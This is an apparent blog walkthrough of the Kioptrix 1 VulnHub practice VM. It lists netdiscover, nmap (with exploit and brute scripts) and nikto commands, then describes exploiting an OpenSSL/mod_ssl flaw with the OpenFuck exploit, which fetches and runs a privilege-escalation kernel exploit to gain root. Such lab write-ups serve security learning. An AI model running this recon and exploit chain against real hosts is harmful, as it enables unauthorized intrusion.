Kioptrix 1 Walkthrough

Kioptrix 1 VulnHub VM Walkthrough

I started with box with a netdiscover scan, found the IP was 192.168.0.130

netdiscover -r 192.168.0.0/24


Then ran an nmap scan and discovered some open ports

nmap -sV -Pn -vv -T4 -A -p- 192.168.0.130 –script=auth,brute,discovery,exploit,vuln -oN 192.168.0.130_nmap.scan


SSH version


Apache version, some OS info and mod_ssl/openssl version


An open rcp port


NetBIOS and https


I continued my enumeration by running dirb against the webserver

dirbuster


I found a site, the Multi-Router Traffic Grapher. I looked up associated vulnerabilities, but didn’t find much 🙁


A Nikto scan picked up a few Apache and OpenSSL vulnerabilities

nikto -h http://192.168.0.130/


I searched for possible exploits in google and found a couple


I tried the second entry, openssl-scanner. The host came back as vulnerable!

This is a great tool if you have to scan an entire network quickly for this openssl exploit
I could use openssl-too-open and escalate privileges manually, but OpenFuck should do this for us 🙂


We execute openfuck with no options to find our OS/apache version


We have to use 0x6b for the exploit to work, and chose 40 connection because the exploit doesn’t always take right away. After we connected to a shell, openfuck downloads, compiles and executes ptrace-kmod to attempt privilege escalation to root. In our case it worked!


After getting root, I looked around the box for anything interesting… I noticed some files in /var/mail/ for a couple users on the box

After cding to the dir, I found a file named”root” which congratulated me for rooting the Vulnerable VM!

Leave a Reply

Your email address will not be published. Required fields are marked *